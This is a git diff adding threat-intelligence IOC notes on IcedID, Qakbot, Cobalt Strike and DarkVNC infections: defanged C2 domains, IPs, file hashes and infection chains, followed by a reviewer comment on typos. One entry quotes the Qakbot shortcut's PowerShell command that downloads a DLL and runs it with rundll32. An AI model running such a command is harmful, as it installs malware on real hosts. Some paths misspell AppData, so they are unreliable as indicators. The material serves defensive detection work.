+- File description: 64-bit DLL made persistent for IcedID infection
+- Run method: rundll32.exe [filename],#1 --ig="HopeDescribe\license.dat"
+
+TRAFFIC FROM AN INFECTED WINDOWS HOST:
+
+TRAFFIC FOR ISO FILE:
+
+- port 443 - hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/filehcA21fXJ3Pqq.html?l=657889339028053050
+- 46.173.215[.]54 port 443 - hxxps://olodaris[.]com/images/logo.jpg
+
+TRAFFIC FOR GZIP BINARY USED TO CREATE LICENSE.DAT AND PERSISTENT ICEDID DLL:
+
+- 51.89.190[.]220 port 80 - yolneanz[.]com - GET /
+
+ICEDID C2 TRAFFIC:
+
+- 85.239.61[.]45 port 443 - ganjicow[.]com - HTTPS traffic
+- 135.148.217[.]93 port 443 - callbackhubs[.]com - HTTPS traffic
+- 85.239.61[.]45 port 443 - meanforthen[.]com - HTTPS traffic
+- 135.148.217[.]93 port 443 - eldingdayl[.]com - HTTPS traffic
+
+COBALT STRIKE TRAFFIC:
+
+- 138.124.183[.]147 port 80 - policyupdating[.]com - GET /microsoft
+- 138.124.183[.]147 port 80 - policyupdating[.]com - GET /styles.css?hour=true
+- 138.124.183[.]147 port 80 - policyupdating[.]com - POST /ro
diff --git a/2022-05-17-IOCS-for-aa-distribution-Qakbot-with-Cobalt-Strike.txt b/2022-05-17-IOCS-for-aa-distribution-Qakbot-with-Cobalt-Strike.txt
new file mode 100644
index 0000000..36c9f5e
--- /dev/null
+++ b/2022-05-17-IOCS-for-aa-distribution-Qakbot-with-Cobalt-Strike.txt
@@ -0,0 +1,57 @@
+2022-05-17 (TUESDAY) - AA DISTRIBUTION QAKBOT (QBOT) LEADS TO COBALT STRIKE
+
+REFERENCE:
+
+- https://twitter.com/Unit42_Intel/status/1526664874180456452
+
+INFECTION CHAIN:
+
+- email --> link --> downloaded zip --> extracted shortcut --> Qakbot DLL --> Qakbot C2 --> Cobalt Strike activity
+
+TRAFFIC TO DOWNLOAD MALICIOUS ZIP ARCHIVE:
+
+- port 80 - http://meumundocatolico[.]com[.]br/pla/xmmuite
+- port 80 - http://meumundocatolico[.]com[.]br/pla/U1810259023.zip
+
+URL HOSTING QAKBOT DLL:
+
+- port 443 hxxps://smartleasesonora[.]com/yVuL6RYk/EW.png
+
+QAKBOT C2 TRAFFIC:
+
+- 38.70.253[.]226 port 2222 - HTTPS traffic
+
+COBALT STRIKE TRAFFIC:
+
+- 23.106.215[.]197 port 443 - rizucem[.]com - HTTPS traffic
+- 193.29.13[.]216 port 443 - svfin[.]icu - HTTPS traffic
+
+NOTES:
+
+- In April 2022, svfin[.]icu resolved to 193.29.13[.]216 and was reported publicly as Cobalt Strike.
+
+- In today's HTTPS traffic, svfin[.]icu is an at-commonName value in certificate issuer data for the associated HTTPS traffic.
+
+MALWARE RETRIEVED FROM AN INFECTED WINDOWS HOST:
+
+- SHA256 hash: f9272801e9f70757819b7d49ebd1b09ec846c1119026aacf5e1ea7f7a77e9125
+- File size: 864 bytes
+- File name: U1810259023.zip
+- File location: hxxp://meumundocatolico[.]com[.]br/pla/U1810259023.zip
+- File description: zip archive retrieved from link in email
+
+- SHA256 hash: 31aff7c4ab72817fc99d95cdde8fb48ff743a92b717a13835ce6410d126a7e0e
+- File size: 2,013 bytes
+- File name: Z81310.lnk
+- File description: Windows shortcut contained in above zip archive
+- Shortcut: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ hxxps://smartleasesonora[.]com/yVuL6RYk/EW.png -OutFile $env:TEMP\z222.dll;Start-Process
+ rundll32 $env:TEMP\z222.dll,DllInstall
+
+- SHA256 hash: 8a383f890745370e6f256396858a94062600f1efd2d1df36ef8a291e41494277
+- File size: 1,841,599 bytes
+- File location: hxxps://smartleasesonora[.]com/yVuL6RYk/EW.png
+- File location: C:\Users\[username]\AppData\Local\Temp\z222.dll
+- File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
+- File description: DLL file for Qakbot
+- Run method: rundll32 [filename],DllInstall
diff --git a/2022-05-23-IOCs-for-IcedID-and-DarkVNC.txt b/2022-05-23-IOCs-for-IcedID-and-DarkVNC.txt
new file mode 100644
index 0000000..a184ae2
--- /dev/null
+++ b/2022-05-23-IOCs-for-IcedID-and-DarkVNC.txt
@@ -0,0 +1,80 @@
+2022-05-23 (MONDAY) - ICEDID (BOKBOT) INFECTION WITH DARKVNC:
+
+REFERENCE:
+
+- https://twitter.com/Unit42_Intel/status/1529113268559699972
+
+NOTES:
+
+- Indications of this infection chain originally appeared last week.
+- It apparently started on Monday 2022-05-16.
+- The Windows shortcut file was first reported at https://twitter.com/malwrhunterteam/status/1526557532277424129
+- The associated files were still available online, and we used them to infect a vulnerable Windows host on Monday 2022-05-23.
+- This infection chain likely used email with a link to the zip-ed Windows shortcut as an initial infection vector.
+
+INFECTION CHAIN:
+
+- URL --> ZIP --> LNK --> HTA --> 64-bit EXE installer for IcedID
+
+INFECTION CHAIN STEP-BY-STEP:
+
+- hxxps://hectorcalle[.]com/May-16_2022.zip --> May-16_2022.lnk
+- May-16_2022.lnkÿ--> hxxps://hectorcalle[.]com/093789.hta
+- hxxps://hectorcalle[.]com/093789.hta --> hxxps://hectorcalle[.]com/listbul.exe
+- hxxps://hectorcalle[.]com/listbul.exe --> C:\Users\[username]\listbul.exe
+
+ICEDID INSTALLER TRAFFFIC FOR GZIP BINARY:
+
+- 94.140.116[.]34 port 80 - hxxp://pilatylu[.]com/
+
+ICEDID POST-INFECTION C2 DOMAINS:
+
+- 45.86.229[.]46 port 443 - guguchrome[.]com - HTTPS traffic
+- 45.86.229[.]46 port 443 - attemptersnext[.]site - HTTPS traffic
+- 5.196.103[.]151 port 443 - hipnoguard[.]com - HTTPS traffic
+- 5.196.103[.]151 port 443 - sawertinoit[.]site - HTTPS traffic
+
+FOLLOW-UP MALICIOUS TRAFFIC FOR DARK VNC:
+
+- 88.119.161[.]76 port 8080 - encrypted TCP traffic
+
+MALWARE/ARTIFACTS:
+
+- SHA256 hash: 547be6f1aebb777b6b729b7b919bb5f7d7f068299f96b92b0b5e601a080c3720
+- File size: 1,206 bytes
+- File location: hxxps://hectorcalle[.]com/May-16_2022.zip
+- File description: zip archive, presumably called from link in malicious email
+
+- SHA256 hash: 24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9
+- File size: 2,559 bytes
+- File name: May-16_2022.lnk
+- File description: Malicious Windows shortcut to install IcedID malware
+
+- SHA256 hash: f59531b810bcbc677907e9fa2be65187b3ee4cd980f633775cc8b2186f3e83d2
+- File size: 130,835 bytes
+- File location: hxxps://hectorcalle[.]com/093789.hta
+- File description: HTA file retrieved by above Windows shortcut
+
+- SHA256 hash: 1e3d10c3c84d7617692174a1f9ae8a658eabb22c7122ef1c8f37f35641ccf7aa
+- File size: 3,000,000 bytes
+- File location: hxxps://hectorcalle[.]com/listbul.exe
+- File location: C:\Users\[username]\listbul.exe
+- File description: IcedID installer retrieved by above HTA file
+
+- SHA256 hash: 28cea90671b362b0c6408c1a031fb571b70f1086a5f40afb1be843d6123ce898
+- File size: 1,337,758 bytes
+- File location: hxxp://pilatylu[.]com/
+- File description: gzip binary from pilatylu.com
+
+- SHA256 hash: dbe9743c9c57247cb9275a23a84909dd78aca59f584df62197bde07cb87bd1ed
+- File size: 342,186 bytes
+- File location: C:\Users\[username]\ApppData\Roaming\LiquidSausage\license.dat
+- File description: Data binary used to run persistent IcedID DLL
+- File note: First submitted to VirusTotal on 2022-04-15
+
+- SHA256 hash: 327006b939627d1300906e10ec00cae6092d97929b104af552c2bd18882f7df3
+- File size: 994,816 bytes
+- File location: C:\Users\[username]\ApppData\Local\[username]\fupodb32.dll
+- File description: 64-bit DLL for persistent IcedID infection
+- Run method: rundll32.exe [filename],#1 --om="LiquidSausage\license.dat"
+- File note: Made persistent through scheduled task
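Review bot: Two file locations in the MALWARE/ARTIFACTS section spell the directory as `ApppData` (`C:\Users\[username]\ApppData\Roaming\LiquidSausage\license.dat` and `C:\Users\[username]\ApppData\Local\[username]\fupodb32.dll`), which does not match the real `AppData` directory and would silently miss if these paths are consumed as file-path indicators. The step-by-step line `May-16_2022.lnkÿ--> hxxps://hectorcalle[.]com/093789.hta` also carries a stray `ÿ` where a space presumably was. Both look like copy/paste artifacts rather than observed values, so I'd correct them to `AppData` and a plain space before the file is used for matching; the same applies to the minor `TRAFFFIC` heading typo.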